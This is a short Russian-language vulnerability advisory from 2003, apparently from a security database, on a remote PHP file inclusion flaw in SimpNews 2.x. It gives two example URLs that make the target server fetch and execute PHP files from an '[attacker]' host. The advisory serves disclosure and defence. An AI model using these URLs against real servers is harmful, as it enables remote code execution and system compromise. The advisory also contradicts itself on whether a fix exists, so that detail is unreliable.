Выполнение произвольного PHP кода в Simpnews

Дата публикации:
23.07.2003
Всего просмотров:
957
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
SimpNews 2.x
Описание: Уязвимость обнаружена в Simpnews (www.boesch-it.de). Удаленный пользователь может выполнить произвольный PHP код, включая команды операционной системы на целевой системе.

Сценарии 'eventscroller.php' и 'eventcal2.php' включают несколько PHP функций без надлежащей проверки включаемых файлов. Удаленный пользователь может сконструировать специально обработанный URL, чтобы заставить целевой сервер включить произвольные PHP файлы на удаленном сервере и затем выполнить их.

Пример:

http://[target]/eventcal2.php.php?path_simpnews=http://[attacker]/

Это URL включит файлы 'config.php', 'functions.php', or 'includes/has_entries.inc' на сайте '[attacker]' и выполнит их на целевом сервере.

http://[target]/eventscroller.php?path_simpnews=http://[attacker]/

Этот URL включит файлы 'config.php' и 'functions.php' на сайте '[attacker]' и выполнит их на целевом сервере.

Уязвимость обнаружена в Simpnews 2.01-2.13

Способов устранения обнаруженной уязвимости не существует в настоящее время.

или введите имя

CAPTCHA